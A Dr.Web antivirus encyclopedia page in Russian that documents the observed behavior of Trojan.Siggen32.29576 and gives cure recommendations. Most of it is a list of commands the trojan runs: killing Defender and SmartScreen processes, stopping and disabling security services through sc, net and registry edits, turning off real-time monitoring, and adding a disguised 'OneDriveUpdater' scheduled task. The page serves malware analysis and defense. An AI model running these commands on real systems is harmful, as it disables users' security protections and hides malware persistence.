Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen32.29576

Добавлен в вирусную базу Dr.Web: 2026-03-22

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
  • <SYSTEM32>\tasks\onedriveupdater
  • <SYSTEM32>\tasks\systemlibrariesu
Устанавливает следующие настройки сервисов
  • [HKLM\SYSTEM\CurrentControlSet\Services\WinDefend] 'ImagePath' = '<SYSTEM32>\svchost.exe -k intlcsrNullGroup'
  • [HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc] 'ImagePath' = '<SYSTEM32>\svchost.exe -k intlcsrNullGroup'
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
  • Системный антивирус (Защитник Windows)
блокирует:
  • Средство контроля пользовательских учетных записей (UAC)
добавляет исключения антивируса:
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
Запускает на исполнение
  • '<SYSTEM32>\taskkill.exe' /F /IM "MsMpEng.exe"
  • '<SYSTEM32>\taskkill.exe' /F /IM "NisSrv.exe"
  • '<SYSTEM32>\taskkill.exe' /F /IM "MpCmdRun.exe"
  • '<SYSTEM32>\taskkill.exe' /F /IM "SecHealthUI.exe"
  • '<SYSTEM32>\taskkill.exe' /F /IM "smartscreen.exe"
  • '<SYSTEM32>\taskkill.exe' /F /IM "MpDlpCmd.exe"
  • '<SYSTEM32>\taskkill.exe' /F /IM "MpCopyAccelerator.exe"
  • '<SYSTEM32>\taskkill.exe' /F /IM "SgrmBroker.exe"
  • '<SYSTEM32>\net.exe' stop "WinDefend" /y
  • '<SYSTEM32>\net.exe' stop "WdNisSvc" /y
  • '<SYSTEM32>\net.exe' stop "WdNisDrv" /y
  • '<SYSTEM32>\net.exe' stop "WdFilter" /y
  • '<SYSTEM32>\net.exe' stop "WdBoot" /y
  • '<SYSTEM32>\net.exe' stop "SecurityHealthService" /y
  • '<SYSTEM32>\net.exe' stop "wscsvc" /y
  • '<SYSTEM32>\net.exe' stop "Sense" /y
  • '<SYSTEM32>\net.exe' stop "SgrmBroker" /y
Запускает большое число процессов
Изменения в файловой системе
Создает следующие файлы
  • conout$
  • %LOCALAPPDATA%\microsoft\windows\actioncentercache\windows-systemtoast-securityandmaintenance_10_0.png
  • %TEMP%\fulltask.exe
  • %TEMP%\corefire.exe
  • %HOMEPATH%\desktop\anydesk\anydesk.exe
  • nul
Перемещает следующие файлы
  • %TEMP%\corefire.exe в %ALLUSERSPROFILE%\microsoft\windows\corefire.exe
Другое
Ищет следующие окна
  • ClassName: '' WindowName: ''
Создает и запускает на исполнение
  • '%TEMP%\fulltask.exe'
  • '%ALLUSERSPROFILE%\microsoft\windows\corefire.exe'
Запускает на исполнение
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "try { $tp = (Get-MpPreference).DisableTamperProtection; if ($tp -eq $false) { exit 1 } else { exit 0 } } catch { exit 0 }" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C move /Y "%TEMP%\corefire.exe" "%ALLUSERSPROFILE%\Microsoft\Windows\corefire.exe" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C schtasks /Query /TN "OneDriveUpdater" >nul 2>&1 || (schtasks /Create /TN "OneDriveUpdater" /TR "\"%ALLUSERSPROFILE%\\Microsoft\\Windows\\corefire.exe\"" /SC MINUTE /MO 1 /F >nul 2>&1 & power... (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "MsMpEng.exe" >nul 2>&1 (со скрытым окном)
  • '%WINDIR%\explorer.exe' "%HOMEPATH%\Desktop\AnyDesk"
  • '<SYSTEM32>\schtasks.exe' /Query /TN "OneDriveUpdater"
  • '<SYSTEM32>\schtasks.exe' /Create /TN "OneDriveUpdater" /TR "\"%ALLUSERSPROFILE%\\Microsoft\\Windows\\corefire.exe\"" /SC MINUTE /MO 1 /F
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "$task = Get-ScheduledTask -TaskName 'OneDriveUpdater'; $task.Settings.DisallowStartIfOnBatteries = $false; $task | Set-ScheduledTask"
  • '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "NisSrv.exe" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "MpCmdRun.exe" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "SecHealthUI.exe" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "smartscreen.exe" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "MpDlpCmd.exe" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "MpCopyAccelerator.exe" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "SgrmBroker.exe" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c powershell -Command "Get-Process 'SecurityHealthSystray.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Get-Process 'SecurityHealthSystray.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }"
  • '<SYSTEM32>\cmd.exe' /c powershell -Command "Get-Process 'SecurityHealthService.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Get-Process 'SecurityHealthService.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }"
  • '<SYSTEM32>\cmd.exe' /c powershell -Command "Get-Process 'SecurityHealthHost.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Get-Process 'SecurityHealthHost.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }"
  • '<SYSTEM32>\cmd.exe' /c net stop "WinDefend" /y >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\net1.exe' stop "WinDefend" /y
  • '<SYSTEM32>\schtasks.exe' /Query /TN "SystemLibrariesU" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c sc stop "WinDefend" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop "WinDefend"
  • '<SYSTEM32>\cmd.exe' /C schtasks /Query /TN "SystemLibrariesU" >nul 2>&1 || (schtasks /Create /TN "SystemLibrariesU" /TR "\"%APPDATA%\Microsoft\Windows\SystemCertificatesData\Tasks\ProtectionWindowsHostProcess.exe\... (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c sc config "WinDefend" start= disabled >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config "WinDefend" start= disabled
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\schtasks.exe' /Create /TN "SystemLibrariesU" /TR "\"%APPDATA%\Microsoft\Windows\SystemCertificatesData\Tasks\ProtectionWindowsHostProcess.exe\"" /SC MINUTE /MO 1 /F
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v Start /t REG_DWORD /d 4 /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\DependOnService" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "$task = Get-ScheduledTask -TaskName 'SystemLibrariesU'; $task.Settings.DisallowStartIfOnBatteries = $false; $task | Set-ScheduledTask"
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\DependOnService" /f
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\FailureActions" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\FailureActions" /f
  • '<SYSTEM32>\cmd.exe' /c net stop "WdNisSvc" /y >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\net1.exe' stop "WdNisSvc" /y
  • '<SYSTEM32>\cmd.exe' /c sc stop "WdNisSvc" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop "WdNisSvc"
  • '<SYSTEM32>\cmd.exe' /c sc config "WdNisSvc" start= disabled >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config "WdNisSvc" start= disabled
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v Start /t REG_DWORD /d 4 /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc\DependOnService" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc\DependOnService" /f
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc\FailureActions" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc\FailureActions" /f
  • '<SYSTEM32>\cmd.exe' /c net stop "WdNisDrv" /y >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\net1.exe' stop "WdNisDrv" /y
  • '<SYSTEM32>\cmd.exe' /c sc stop "WdNisDrv" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop "WdNisDrv"
  • '<SYSTEM32>\cmd.exe' /c sc config "WdNisDrv" start= disabled >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config "WdNisDrv" start= disabled
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv\DependOnService" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv\DependOnService" /f
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv\FailureActions" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv\FailureActions" /f
  • '<SYSTEM32>\cmd.exe' /c net stop "WdFilter" /y >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\net1.exe' stop "WdFilter" /y
  • '<SYSTEM32>\cmd.exe' /c sc stop "WdFilter" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop "WdFilter"
  • '<SYSTEM32>\cmd.exe' /c sc config "WdFilter" start= disabled >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config "WdFilter" start= disabled
  • '<SYSTEM32>\cmd.exe' /C schtasks /End /TN "SystemLibrariesU" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v Start /t REG_DWORD /d 4 /f
  • '<SYSTEM32>\schtasks.exe' /End /TN "SystemLibrariesU"
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\DependOnService" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C schtasks /Change /TN "SystemLibrariesU" /DISABLE >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\DependOnService" /f
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\schtasks.exe' /Change /TN "SystemLibrariesU" /DISABLE
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\FailureActions" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\FailureActions" /f
  • '<SYSTEM32>\cmd.exe' /c net stop "WdBoot" /y >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\net1.exe' stop "WdBoot" /y
  • '<SYSTEM32>\cmd.exe' /c sc stop "WdBoot" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop "WdBoot"
  • '<SYSTEM32>\cmd.exe' /c sc config "WdBoot" start= disabled >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config "WdBoot" start= disabled
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v Start /t REG_DWORD /d 4 /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot\DependOnService" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot\DependOnService" /f
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot\FailureActions" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot\FailureActions" /f
  • '<SYSTEM32>\cmd.exe' /c net stop "SecurityHealthService" /y >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\net1.exe' stop "SecurityHealthService" /y
  • '<SYSTEM32>\cmd.exe' /c sc stop "SecurityHealthService" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop "SecurityHealthService"
  • '<SYSTEM32>\cmd.exe' /c sc config "SecurityHealthService" start= disabled >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config "SecurityHealthService" start= disabled
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d 4 /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService\DependOnService" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService\DependOnService" /f
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService\FailureActions" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService\FailureActions" /f
  • '<SYSTEM32>\cmd.exe' /c net stop "wscsvc" /y >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\net1.exe' stop "wscsvc" /y
  • '<SYSTEM32>\cmd.exe' /c sc stop "wscsvc" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop "wscsvc"
  • '<SYSTEM32>\cmd.exe' /c sc config "wscsvc" start= disabled >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config "wscsvc" start= disabled
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 4 /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\DependOnService" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\DependOnService" /f
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\FailureActions" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\FailureActions" /f
  • '<SYSTEM32>\cmd.exe' /c net stop "Sense" /y >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\net1.exe' stop "Sense" /y
  • '<SYSTEM32>\cmd.exe' /c sc stop "Sense" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop "Sense"
  • '<SYSTEM32>\cmd.exe' /c sc config "Sense" start= disabled >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config "Sense" start= disabled
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v Start /t REG_DWORD /d 4 /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense\DependOnService" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense\DependOnService" /f
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense\FailureActions" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense\FailureActions" /f
  • '<SYSTEM32>\cmd.exe' /c net stop "SgrmBroker" /y >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\net1.exe' stop "SgrmBroker" /y
  • '<SYSTEM32>\cmd.exe' /c sc stop "SgrmBroker" >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop "SgrmBroker"
  • '<SYSTEM32>\cmd.exe' /c sc config "SgrmBroker" start= disabled >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config "SgrmBroker" start= disabled
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v Start /t REG_DWORD /d 4 /f
  • '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SgrmBroker\DependOnService" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\SgrmBroker\DependOnService" /f
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true" (со скрытым окном)
  • '%TEMP%\fulltask.exe'  (со скрытым окном)
  • '%ALLUSERSPROFILE%\microsoft\windows\corefire.exe'  (со скрытым окном)

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке